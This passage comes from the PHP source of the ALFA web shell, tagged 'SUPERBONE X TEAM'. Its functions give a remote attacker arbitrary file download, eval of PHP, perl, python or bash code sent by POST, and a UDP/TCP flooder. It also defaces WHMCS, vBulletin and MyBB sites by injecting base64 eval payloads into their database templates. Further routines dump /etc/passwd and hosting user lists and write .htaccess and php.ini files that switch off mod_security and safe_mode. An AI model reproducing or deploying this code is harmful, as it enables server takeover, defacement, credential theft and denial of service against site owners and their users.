  3578. return (in_array($ext,$types)?$s.$ext.'.png':$s.'notfound.png');
  3579. }
  3580. }
  3581. function alfadlfile(){
  3582. if(isset($_POST['c'],$_POST['file'])){
  3583. $basename = rawurldecode(basename($_POST['file']));
  3584. $_POST['file'] = str_replace("//", "/", $_POST['c'].'/'.$basename);
  3585. $alfa_canruncmd = _alfa_can_runCommand(true,true);
  3586. if(@is_file($_POST['file']) && @is_readable($_POST['file']) || $alfa_canruncmd){
  3587. ob_start("ob_gzhandler", 4096);
  3588. header("Content-Disposition: attachment; filename=\"".addslashes($basename)."\"");
  3589. header("Content-Type: application/octet-stream");
  3590. if(isset($GLOBALS["glob_chdir_false"])){
  3591. $randname = $basename.rand(111,9999);
  3592. $scriptpath = dirname($_SERVER["SCRIPT_FILENAME"]);
  3593. $filepath = $scriptpath."/".$randname;
  3594. if(_alfa_is_writable($scriptpath)){
  3595. alfaEx("cp '".addslashes($_POST["file"])."' '".addslashes($filepath)."'");
  3596. readfile($filepath);
  3597. @unlink($filepath);
  3598. }else{
  3599. alfaEx("cat '".addslashes($_POST["file"])."'");
  3600. }
  3601. }else{
  3602. readfile($_POST['file']);
  3603. }
  3604. }else echo('Error...!');}}
  3605. function alfaphpeval(){
  3606. alfahead();
  3607. if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'ini')){
  3608. echo '<div class=header>';
  3609. ob_start();
  3610. $INI=ini_get_all();
  3611. print '<table border=0><tr>'
  3612. .'<td class="listing"><font class="highlight_txt">Param</td>'
  3613. .'<td class="listing"><font class="highlight_txt">Global value</td>'
  3614. .'<td class="listing"><font class="highlight_txt">Local Value</td>'
  3615. .'<td class="listing"><font class="highlight_txt">Access</td></tr>';
  3616. foreach ($INI as $param => $values)
  3617. print "\n".'<tr>'
  3618. .'<td class="listing"><b>'.$param.'</td>'
  3619. .'<td class="listing">'.$values['global_value'].' </td>'
  3620. .'<td class="listing">'.$values['local_value'].' </td>'
  3621. .'<td class="listing">'.$values['access'].' </td></tr>';
  3622. $tmp = ob_get_clean();
  3623. $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
  3624. $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
  3625. echo str_replace('<h1','<h2', $tmp) .'</div><br>';
  3626. }
  3627. if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'info')) {
  3628. echo '<div class=header><style>.p {color:#000;}</style>';
  3629. ob_start();
  3630. phpinfo();
  3631. $tmp = ob_get_clean();
  3632. $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
  3633. $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
  3634. echo str_replace('<h1','<h2', $tmp) .'</div><br>';
  3635. }
  3636. if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'exten')) {
  3637. echo '<div class=header>';
  3638. ob_start();
  3639. $EXT=get_loaded_extensions();
  3640. echo '<table border=0><tr><td class="listing">'.implode('</td></tr>'."\n".'<tr><td class="listing">', $EXT).'</td></tr></table>'.count($EXT).' extensions loaded';
  3641. echo '</div><br>';
  3642. }
  3643. $lang_html = "";
  3644. foreach(array("php"=>"php ~> [ Windows / Linux ]","perl"=>"perl ~> [ Linux ]","python"=>"python ~> [ Linux ]","bash"=>"bash ~> [ Linux ]") as $key=>$val){$lang_html .= '<option value="'.$key.'" '.($_POST["alfa3"]==$key?"selected":"").'>'.$val.'</option>';}
  3645. echo '<div class=header><Center><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'ini\')">| INI_INFO | </a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'info\')"> | phpinfo |</a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'exten\')"> | extensions |</a></center><br><form name=pf method=post onsubmit="g(\'phpeval\',null,this.code.value,null,this.language.value); return false;"><div class="txtfont">Select Language: </div> <select name="language" style="width:300px;">'.$lang_html.'</select><br><br><textarea placeholder="file_get_contents(\'/etc/passwd\');" name=code class=bigarea id=PhpCode>'.(!empty($_POST['alfa1'])?htmlspecialchars($_POST['alfa1']):'').'</textarea><center><input type="submit" value="" style="margin-top:5px"></center>';
  3646. echo '</form><pre id=PhpOutput style="'.(empty($_POST['alfa1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
  3647. if(!empty($_POST['alfa1'])){
  3648. if($_POST['alfa3']=="php"){
  3649. ob_start();eval($_POST['alfa1']);
  3650. $result = htmlspecialchars(ob_get_clean());
  3651. }elseif(_alfa_can_runCommand()&&$GLOBALS["sys"]=="unix"){
  3652. if(isset($_SESSION["eval_tmpdir"])){
  3653. $tempdir = $_SESSION["eval_tmpdir"];
  3654. }else{
  3655. $tempdir = dirname(alfaEx("mktemp"));
  3656. $_SESSION["eval_tmpdir"] = $tempdir;
  3657. }
  3658. $lang = $_POST['alfa3'];
  3659. $filename = "temp".rand(11111,99999);
  3660. $temp = $tempdir."/".$filename ;
  3661. __write_file($filename, $_POST['alfa1']);
  3662. $result = alfaEx("mv {$filename} {$temp};{$lang} {$temp};rm -f {$temp}");
  3663. @unlink($filename);
  3664. @unlink($temp);
  3665. }
  3666. echo '<textarea class=bigarea id="PhpCode">'.$result.'</textarea>';
  3667. }
  3668. echo '</pre></div>';
  3669. alfafooter();
  3670. }
  3671. function alfahash(){
  3672. if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
  3673. if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
  3674. $stringTools = array(
  3675. 'Base64_encode ( $string )' => '__ZW5jb2Rlcg($s)',
  3676. 'Base64_decode ( $string )' => '__ZGVjb2Rlcg($s)',
  3677. 'strrev ( $string )' => 'strrev($s)',
  3678. 'bin2hex ( $string )' => 'bin2hex($s)',
  3679. 'hex2bin ( $string )' => 'hex2bin($s)',
  3680. 'md5 ( $string )' => 'md5($s)',
  3681. 'sha1 ( $string )' => 'sha1($s)',
  3682. 'hash ( "sha251", $string ) --> sha251' => 'hash("sha256",$s)',
  3683. 'hash ( "sha384", $string ) --> sha384' => 'hash("sha384",$s)',
  3684. 'hash ( "sha512", $string ) --> sha512' => 'hash("sha512",$s)',
  3685. 'crypt ( $string )' => 'crypt($s)',
  3686. 'crc32 ( $string )' => 'crc32($s)',
  3687. 'str_rot13 ( $string )' => 'str_rot13($s)',
  3688. 'urlencode ( $string )' => 'urlencode($s)',
  3689. 'urldecode ( $string )' => 'urldecode($s)',
  3690. 'full_urlencode ( $string )' => 'full_urlencode($s)',
  3691. 'htmlspecialchars ( $string )' => 'htmlspecialchars($s)',
  3692. 'base64_encode (gzdeflate( $string , 9)) --> Encode' => '__ZW5jb2Rlcg(gzdeflate($s, 9))',
  3693. 'gzinflate (base64_decode( $string )) --> Decode' => '@gzinflate(__ZGVjb2Rlcg($s))',
  3694. 'str_rot13 (base64_encode( $string )) --> Encode' => 'str_rot13(__ZW5jb2Rlcg($s))',
  3695. 'base64_decode (str_rot13( $string )) --> Decode' => '__ZGVjb2Rlcg(str_rot13($s))',
  3696. 'str_rot13 (base64_encode(gzdeflate( $string , 9))) --> Encode' => 'str_rot13(__ZW5jb2Rlcg(gzdeflate($s,9)))',
  3697. 'gzinflate (base64_decode(str_rot13( $string ))) --> Decode' => '@gzinflate(__ZGVjb2Rlcg(str_rot13($s)))',
  3698. );
  3699. alfahead();
  3700. echo '<div class=header>';
  3701. echo "<form onSubmit='g(\"hash\",null,this.selectTool.value,this.input.value);return false;'><div class='txtfont'>Method:</div> <select name='selectTool' style='width:400px;'>";
  3702. foreach($stringTools as $k => $v)
  3703. echo "<option value='".htmlspecialchars($v)."' ".($_POST['alfa1']==$v?'selected':'').">".$k."</option>";
  3704. echo "</select> <input type='submit' value=' '/><br><textarea name='input' style='margin-top:5px' class='bigarea'>".(empty($_POST['alfa1'])?'':htmlspecialchars(@$_POST['alfa2']))."</textarea></form>";
  3705. if(!empty($_POST['alfa1'])){
  3706. $string = addslashes($_POST['alfa2']);
  3707. $string = str_replace('\"','"',$string);
  3708. $alg = $_POST['alfa1'];
  3709. $code = str_replace('$s',"'".$string."'",$alg);
  3710. ob_start();
  3711. eval('echo '.$code.';');
  3712. $res = ob_get_contents();
  3713. ob_end_clean();
  3714. if(in_array($alg, $stringTools))echo '<textarea class="bigarea" id="PhpCode">'.htmlspecialchars($res).'</textarea>';
  3715. }
  3716. echo "</div>";
  3717. alfaFooter();
  3718. }
  3719. function alfados(){
  3720. alfahead();
  3721. echo '<div class=header>';
  3722. echo '<center><p><div class="txtfont_header">| DOS |</div></p><form onSubmit="g(\'dos\',null,this.host.value,this.time.value,this.port.value,this.m.value); return false;"><div class="txtfont">Method : <select name="m" style="width:80px;"><option value="udp">UDP</option><option value="tcp">TCP</option></select> Host : <input name="host" type="text" value="localhost" size="25" /> Time : <input name="time" type="text" size="15" /> Port : <input name="port" type="text" size="10" /> <input type="submit" value=" " /></div></form></center><br>';
  3723. if(!empty($_POST['alfa1']) && !empty($_POST['alfa2']) && !empty($_POST['alfa3'])){
  3724. echo __pre();
  3725. $packets=0;
  3726. ignore_user_abort(true);
  3727. $exec_time=(int)$_POST['alfa2'];
  3728. $time=time();
  3729. $max_time=$exec_time+$time;
  3730. $host=$_POST['alfa1'];
  3731. $port=(int)$_POST['alfa3'];
  3732. $method=$_POST['alfa4'];
  3733. $out = str_repeat('X',65000);
  3734. while(1){
  3735. $packets++;
  3736. if(time() > $max_time){
  3737. break;
  3738. }
  3739. $fp = @fsockopen($method.'://'.$host, $port, $errno, $errstr, 5);
  3740. if($fp){
  3741. fwrite($fp, $out);
  3742. fclose($fp);
  3743. }
  3744. }
  3745. echo "<center>$packets (" . @round(($packets*65)/1024, 2) . " MB) packets averaging ". @round($packets/$exec_time, 2) . " packets per second</center>";
  3746. echo "</pre>";
  3747. }
  3748. echo '</div>';
  3749. alfafooter();
  3750. }
  3751. function __pre(){return('<pre id="strOutput" style="margin-top:5px" class="ml1">');}
  3752. function alfaIndexChanger(){
  3753. alfahead();
  3754. echo '<div class=header><center><p><div class="txtfont_header">| Index Changer |</div></p><h3><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,null,\'whmcs\')">| Whmcs | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,\'vb\',null)">| vBulletin | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,\'mybb\')">| MyBB | </a></h3></center>';
  3755. if(isset($_POST['alfa3'])&&($_POST['alfa3'] == 'whmcs')){
  3756. echo __pre();
  3757. echo "<center><center><div class='txtfont_header'>| Whmcs |</div>
  3758. <p><center>".getConfigHtml('whmcs')."<form onSubmit=\"g('IndexChanger',null,null,null,'whmcs',this.fname.value,this.path.value,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value); return false;\">
  3759. ";
  3760. $table = array('td1' =>
  3761. array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
  3762. 'td2' =>
  3763. array('color' => 'FFFFFF', 'tdName' => 'URL', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),
  3764. 'td3' =>
  3765. array('color' => 'FFFFFF', 'tdName' => 'File Name', 'inputName' => 'fname', 'inputValue' => '', 'inputSize' => '50'),
  3766. 'td4' =>
  3767. array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
  3768. 'td5' =>
  3769. array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
  3770. 'td6' =>
  3771. array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
  3772. );
  3773. create_table($table);
  3774. echo "<br><div class='txtfont'>| Your Index |</div><br>
  3775. <textarea name=index rows='19' cols='103'><title>Hacked By SUPERBONE X TEAM</title><b>Hacked By SUPERBONE X TEAM</b></textarea><br>
  3776. <input type='submit' value=' '>
  3777. </form></center></center>";
  3778. if(isset($_POST['alfa6'])){
  3779. $s0levisible="Powered By Solevisible";
  3780. $dbu = $_POST['alfa6'];
  3781. $path = $_POST['alfa5'];
  3782. $fname = $_POST['alfa4'];
  3783. $dbn = $_POST['alfa7'];
  3784. $dbp = $_POST['alfa8'];
  3785. $dbh = $_POST['alfa9'];
  3786. $index = $_POST['alfa10'];
  3787. $index = str_replace("\'","'",$index);
  3788. $deface = '$x = base64_decode("'.__ZW5jb2Rlcg($index).'"); $solevisible = fopen("'.$fname.'","w"); fwrite($solevisible,$x);';
  3789. $saveData = __ZW5jb2Rlcg($deface);
  3790. $Def = '{php}eval(base64_decode("'.$saveData.'"));{/php}';
  3791. if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){
  3792. $conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
  3793. $soleSave=@mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");
  3794. $soleGet = mysqli_fetch_assoc($soleSave);
  3795. $tempSave1 = $soleGet['message'];
  3796. $tempSave = str_replace("'","\'",$tempSave1);
  3797. $inject = "UPDATE tblemailtemplates SET message='$Def' WHERE name='Password Reset Validation'";
  3798. $result=@mysqli_query($conn,$inject) or die (mysqli_error($conn));
  3799. $create = "insert into tblclients (email) values('solevisible@fbi.gov')";
  3800. $result2 =@mysqli_query($conn,$create) or die (mysqli_error($conn));
  3801. if(function_exists('curl_version')){
  3802. $AlfaSole = new AlfaCURL(true);
  3803. $saveurl = $AlfaSole->Send($path."/pwreset.php");
  3804. $getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);
  3805. $AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");
  3806. $backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
  3807. $Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
  3808. __alert('File Created...');
  3809. echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='".$path."/".$fname."'>Click Here !</a></font></b></center><br><br>";
  3810. }else{
  3811. echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target </font><font color=red>\" ".$path."/pwreset.php \"</font><br/><font color=\"#FFFFFF\"> and reset password with email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color=\"#FFFFFF\">and go to</font> <font color=red>\" ".$path."/".$fname." \"</font></b></center><br><br>";
  3812. }}}}
  3813. if(isset($_POST['alfa1']) && ($_POST['alfa1'] == 'vb')){
  3814. echo __pre();
  3815. echo "<center><center><div class='txtfont_header'>| vBulletin |</div>
  3816. <p><center>".getConfigHtml('vb')."<form onSubmit=\"g('IndexChanger',null,'vb',this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value,this.prefix.value,'>>'); return false;\">
  3817. ";
  3818. $table = array('td1' =>
  3819. array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
  3820. 'td2' =>
  3821. array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
  3822. 'td3' =>
  3823. array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
  3824. 'td4' =>
  3825. array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
  3826. 'td5' =>
  3827. array('color' => 'FFFFFF', 'tdName' => 'Prefix', 'inputName' => 'prefix', 'id' => 'db_prefix', 'inputValue' => '', 'inputSize' => '50')
  3828. );
  3829. create_table($table);
  3830. echo "<br><div class='txtfont'>| Your Index |</div><br>
  3831. <textarea name='index' rows='19' cols='103'><title>Hacked By SUPERBONE X TEAM</title><b>Hacked By SUPERBONE X TEAM</b></textarea><br>
  3832. <input type='submit' value=' '></form></center></center>";
  3833. if($_POST['alfa8']=='>>'){
  3834. $s0levisible="Powered By Solevisible";
  3835. $dbu = $_POST['alfa2'];
  3836. $dbn = $_POST['alfa3'];
  3837. $dbp = $_POST['alfa4'];
  3838. $dbh = $_POST['alfa5'];
  3839. $index = $_POST['alfa6'];
  3840. $prefix = $_POST['alfa7'];
  3841. $index=str_replace("\'","'",$index);
  3842. $set_index = "{\${eval(base64_decode(\'";
  3843. $set_index .= __ZW5jb2Rlcg("echo \"$index\";");
  3844. $set_index .= "\'))}}{\${exit()}}";
  3845. if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){
  3846. $conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
  3847. $loli1 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='spacer_open'";
  3848. $loli2 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='FORUMHOME'";
  3849. $loli3 = "UPDATE ".$prefix."style SET css='".$set_index."".$s0levisible."', stylevars='', csscolors='', editorstyles=''";
  3850. @mysqli_query($conn,$loli1) or die (mysqli_error($conn));
  3851. @mysqli_query($conn,$loli2) or die (mysqli_error($conn));
  3852. @mysqli_query($conn,$loli3) or die (mysqli_error($conn));
  3853. __alert('VB index changed...!');
  3854. }
  3855. }
  3856. }
  3857. if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'mybb')) {
  3858. echo __pre();
  3859. echo "<center><center><div class='txtfont_header'>| Mybb |</div>
  3860. <p><center>".getConfigHtml('mybb')."<form onSubmit=\"g('IndexChanger',null,'null','mybb',null,null,null,this.mybbdbh.value,this.mybbdbu.value,this.mybbdbn.value,this.mybbdbp.value,this.mybbindex.value); return false;\" method=POST action=''>
  3861. ";
  3862. $table = array('td1' =>
  3863. array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'mybbdbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
  3864. 'td2' =>
  3865. array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'mybbdbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
  3866. 'td3' =>
  3867. array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'mybbdbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
  3868. 'td4' =>
  3869. array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'mybbdbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
  3870. );
  3871. create_table($table);
  3872. echo "<br><div class='txtfont'>| Your Index |</div><br>
  3873. <textarea name=mybbindex rows='19' cols='103'>
  3874. <title>Hacked By SUPERBONE X TEAM</title><b>Hacked By SUPERBONE X TEAM</b></textarea><p><input type='submit' value='' ></p></form></center></center>";
  3875. if(isset($_POST['alfa6'])){
  3876. $mybb_dbh = $_POST['alfa6'];
  3877. $mybb_dbu = $_POST['alfa7'];
  3878. $mybb_dbn = $_POST['alfa8'];
  3879. $mybb_dbp = $_POST['alfa9'];
  3880. $mybb_index = $_POST['alfa10'];
  3881. if(!empty($mybb_dbh)&&!empty($mybb_dbu)&&!empty($mybb_dbn)&&!empty($mybb_index)){
  3882. $conn=@mysqli_connect($mybb_dbh,$mybb_dbu,$mybb_dbp,$mybb_dbn) or die(mysqli_error($conn));
  3883. $prefix="mybb_";
  3884. $loli7 = "UPDATE ".$prefix."templates SET template='".$mybb_index."' WHERE title='index'";
  3885. $result =@mysqli_query($conn,$loli7) or die (mysqli_error($conn));
  3886. __alert('MyBB index changed...!');
  3887. }
  3888. }
  3889. }
  3890. echo "</div>";
  3891. alfafooter();
  3892. }
  3893. function alfaproc()
  3894. {
  3895. alfahead();
  3896. echo "<Div class=header><br><center>";
  3897. if(empty($_POST['ajax'])&&!empty($_POST['alfa1']))
  3898. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  3899. if($GLOBALS['sys']=="win"){
  3900. $process=array(
  3901. "Task List" =>"tasklist /V",
  3902. "System Info" =>"systeminfo",
  3903. "Active Connections" => "netstat -an",
  3904. "Running Services" => "net start",
  3905. "User Accounts" => "net user",
  3906. "Show Computers" => "net view",
  3907. "ARP Table" => "arp -a",
  3908. "IP Configuration" => "ipconfig /all"
  3909. );}else{
  3910. $process=array(
  3911. "Process status" => "ps aux",
  3912. "Syslog" =>"cat /etc/syslog.conf",
  3913. "Resolv" => "cat /etc/resolv.conf",
  3914. "Hosts" =>"cat /etc/hosts",
  3915. "Cpuinfo"=>"cat /proc/cpuinfo",
  3916. "Version"=>"cat /proc/version",
  3917. "Sbin"=>"ls -al /usr/sbin",
  3918. "Interrupts"=>"cat /proc/interrupts",
  3919. "lsattr"=>"lsattr -va",
  3920. "Uptime"=>"uptime",
  3921. "Fstab" =>"cat /etc/fstab"
  3922. );}
  3923. foreach($process as $n => $link){
  3924. echo '<a href="javascript:void(0);" onclick="g(\'proc\',null,\''.$link.'\')"> | '.$n.' | </a>';
  3925. }
  3926. echo "</center><br>";
  3927. if(!empty($_POST['alfa1'])){
  3928. echo "<pre class='ml1' style='margin-top:5px' >";
  3929. if(isset($GLOBALS["glob_chdir_false"])&&!empty($_POST["c"])){$cmd = "cd '".addslashes($_POST["c"])."';";}
  3930. echo alfaEx($cmd.$_POST['alfa1']);
  3931. echo '</pre>';
  3932. }
  3933. echo "</div>";
  3934. alfafooter();
  3935. }
  3936. function alfasafe(){
  3937. alfahead();
  3938. echo "<div class=header><center><br><div class='txtfont_header'>| Auto ByPasser |</div>";
  3939. echo '<h3><a href=javascript:void(0) onclick="g(\'safe\',null,\'php.ini\',null)">| PHP.INI | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,\'ini\')">| .htaccess(apache) | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,\'pl\')">| .htaccess(LiteSpeed) |</a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,\'passwd\')">| Read-Passwd | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,\'users\')">| Read-Users | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,\'valiases\')">| Get-User | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,null,null,\'domains\')">| Get-Domains | </a></center></h3>';
  3940. if(!empty($_POST['alfa8']) && isset($_POST['alfa8']) == 'domains'){
  3941. if(!_alfa_file_exists("/etc/virtual/domainowners")){
  3942. echo __pre();
  3943. $solevisible9 = _alfa_file('/etc/named.conf');
  3944. if(is_array($solevisible9)){
  3945. foreach($solevisible9 as $solevisible13){
  3946. if(@eregi('zone',$solevisible13)){
  3947. preg_match_all('#zone "(.*)"#',$solevisible13,$solevisible14);
  3948. if(strlen(trim($solevisible14[1][0])) > 2){
  3949. echo $solevisible14[1][0].'<br>';
  3950. }}}
  3951. }
  3952. }else{
  3953. echo __pre();
  3954. $users = _alfa_file("/etc/virtual/domainowners");
  3955. if(is_array($users)){
  3956. foreach($users as $boz){
  3957. $dom = explode(":",$boz);
  3958. echo $dom[0]."\n";}}}}
  3959. if(!empty($_POST['alfa6']) && isset($_POST['alfa6']) == 'valiases'){
  3960. echo '
  3961. <form onsubmit="g(\'safe\',null,null,null,null,null,null,\'valiases\',this.site.value,null,\'>>\'); return false;" method="post" /><center><div class="txtfont">Url: </font><input type="text" placeholder="site.com" name="site" /> <input type="submit" value=" " name="go" /></form></center>';
  3962. if(isset($_POST['alfa9']) && $_POST['alfa9'] == '>>'){
  3963. if(!_alfa_file_exists("/etc/virtual/domainowners")){
  3964. $site = trim($_POST['alfa7']);
  3965. $rep = str_replace(array("https://","http://","www."),"",$site);
  3966. $user = "";
  3967. if(function_exists("posix_getpwuid") && function_exists("fileowner")){
  3968. if($user = @posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))){
  3969. $user = $user['name'];
  3970. }
  3971. }else{
  3972. if(_alfa_can_runCommand(true,true)){
  3973. $user = alfaEx("stat -c '%U' /etc/valiases/".$rep);
  3974. }
  3975. }
  3976. if(!empty($user)&&$user!='root'){
  3977. echo __pre()."<center><table border='1'><tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">{$user}</font></b></td></tr><tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";
  3978. }else {echo __pre().'<center><b>No such file or directory Or Disable Functions is not NONE...</b></center>';}
  3979. }else{
  3980. $site = trim($_POST['alfa7']);
  3981. $rep = str_replace(array("https://","http://","www."),"",$site);
  3982. $users = _alfa_file("/etc/virtual/domainowners");
  3983. foreach($users as $boz){
  3984. $ex = explode(":",$boz);
  3985. if($ex[0] == $rep){
  3986. echo __pre()."<center><table border='1'>
  3987. <tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">".trim($ex[1])."</font></b></td></tr>
  3988. <tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";break;}}}}}
  3989. if(!empty($_POST['alfa5']) && isset($_POST['alfa5'])){
  3990. if(!_alfa_file_exists("/etc/virtual/domainowners")){
  3991. echo __pre();
  3992. $i = 0;
  3993. while ($i < 60000) {
  3994. $line = @posix_getpwuid($i);
  3995. if (!empty($line)) {
  3996. while (list ($key, $vl) = each($line)){
  3997. echo $vl."\n";
  3998. break;}}$i++;}
  3999. }else{echo __pre();
  4000. $users = _alfa_file("/etc/virtual/domainowners");
  4001. foreach($users as $boz){
  4002. $user = explode(":",$boz);
  4003. echo trim($user[1]).'<br>';}}}
  4004. if(!empty($_POST['alfa4']) && isset($_POST['alfa4'])){
  4005. echo __pre();
  4006. if(_alfa_can_runCommand(true,true)){echo __read_file("/etc/passwd");}elseif(function_exists("posix_getpwuid")){
  4007. for($uid=0;$uid<60000;$uid++){
  4008. $ara = @posix_getpwuid($uid);
  4009. if(!empty($ara)){
  4010. while(list ($key, $val) = each($ara)){
  4011. echo "$val:";
  4012. }echo "\n";}}
  4013. }else{__alert('failed...');}}
  4014. if(!empty($_POST['alfa2']) && isset($_POST['alfa2'])){
  4015. @__write_file($GLOBALS['cwd'].".htaccess","#Generated By SEO K and Invisible\n<IfModule mod_security.c>\nSec------Engine Off\nSec------ScanPOST Off\n</IfModule>");
  4016. echo '<center><b><big>htaccess for Apache created...!</center></b></big>';
  4017. }
  4018. if(!empty($_POST['alfa1'])&& isset($_POST['alfa1'])){
  4019. @__write_file($GLOBALS['cwd']."php.ini","safe_mode=OFF\ndisable_functions=ByPassed By SUPERBONE X TEAM(ALFA TEaM)");
  4020. echo '<center><b><big> php.ini created...!</center></b></big>';
  4021. }
  4022. if(!empty($_POST['alfa3']) && isset($_POST['alfa3'])){
  4023. @__write_file($GLOBALS['cwd'].".htaccess","#Generated By SEO K and Invisible\n<Files *.php>\nForceType application/x-httpd-php4\n</Files>\n<IfModule mod_security.c>\nSecFilterEngine Off\nSecFilterScanPOST Off\n</IfModule>");
  4024. echo '<center><b><big>htaccess for Litespeed created...!</center></b></big>';
  4025. }
  4026. echo "<br></div>";
  4027. alfafooter();
  4028. }
  4029. function __get_resource($content){
  4030. return @gzinflate(__ZGVjb2Rlcg($content));
  4031. }
  4032. function __write_file($file, $content){
  4033. if($fh = @fopen($file, "wb")){
  4034. if(fwrite($fh, $content)!==false) return true;
  4035. }
  4036. return false;
  4037. }
  4038. function bcinit($evalType, $evalCode, $evalOptions, $evalArguments){
  4039. $res = "<font color='green'>[ Success...! ]</font>";
  4040. $err = "<font color='red'>[ Failed...! ]</font>";
  4041. if($evalOptions!="") $evalOptions = $evalOptions." ";
  4042. if($evalArguments!="") $evalArguments = " ".$evalArguments;
  4043. if($evalType=="c"){
  4044. $tmpdir = ALFA_TEMPDIR;
  4045. chdir($tmpdir);
  4046. if(is_writable($tmpdir)){
  4047. $uniq = substr(md5(time()),0,8);
  4048. $filename = $evalType.$uniq.".c";
  4049. $path = $filename;
  4050. if(__write_file($path, $evalCode)){
  4051. $ext = ($GLOBALS['sys']=='win')? ".exe":".out";
  4052. $pathres = $filename.$ext;
  4053. $evalOptions = "-o ".$pathres." ".$evalOptions;
  4054. $cmd = "gcc ".$evalOptions.$path;
  4055. alfaEx($cmd);
  4056. if(is_file($pathres)){
  4057. if(chmod($pathres, 0755)){
  4058. $cmd = $pathres.$evalArguments;
  4059. alfaEx($cmd);
  4060. }else{$res = $err;}
  4061. unlink($pathres);
  4062. }else{$res =$err;}
  4063. unlink($path);
  4064. }else{$res = $err;}
  4065. }
  4066. return $res;
  4067. }elseif($evalType=="java"){
  4068. $tmpdir = ALFA_TEMPDIR;
  4069. chdir($tmpdir);
  4070. if(is_writable($tmpdir)){
  4071. if(preg_match("/class\ ([^{]+){/i",$evalCode, $r)){
  4072. $classname = trim($r[1]);
  4073. $filename = $classname;
  4074. }else{
  4075. $uniq = substr(md5(time()),0,8);
  4076. $filename = $evalType.$uniq;
  4077. $evalCode = "class ".$filename." { ".$evalCode . " } ";
  4078. }
  4079. $path = $filename.".java";
